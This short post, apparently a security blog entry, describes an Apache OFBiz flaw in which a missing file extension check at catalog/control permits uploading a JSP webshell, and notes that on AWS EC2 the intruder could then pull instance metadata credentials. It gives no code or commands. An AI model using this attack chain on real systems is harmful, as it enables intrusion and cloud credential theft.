Preface: According to market statistic, 152 companies that use Apache OFBiz. The companies using Apache OFBiz are most often found in United States and in the Computer Software industry.

Background: Apache OFBiz is a suite of business applications flexible enough to be used across any industry. OFBiz is an open source enterprise resource planning (ERP) system. A common architecture allows developers to easily extend or enhance it to create custom features.

Vulnerability focus: Expert found that lack of file extension check at catalog/control. Therefore it is able to allow to uploading a webshell jsp script. Meanwhile, if the vulnerable system run on top of Amazon Elastic Compute Cloud . It can retrieve the user credential due to AWS design principle.

Reserved set of security-credentials in AWS?

Instance-identity – security credentials are that can be generated using the metadata instance on every EC2 instance in AWS, even when no role is attached to the instance.

Official announcement – https://issues.apache.org/jira/browse/OFBIZ-12080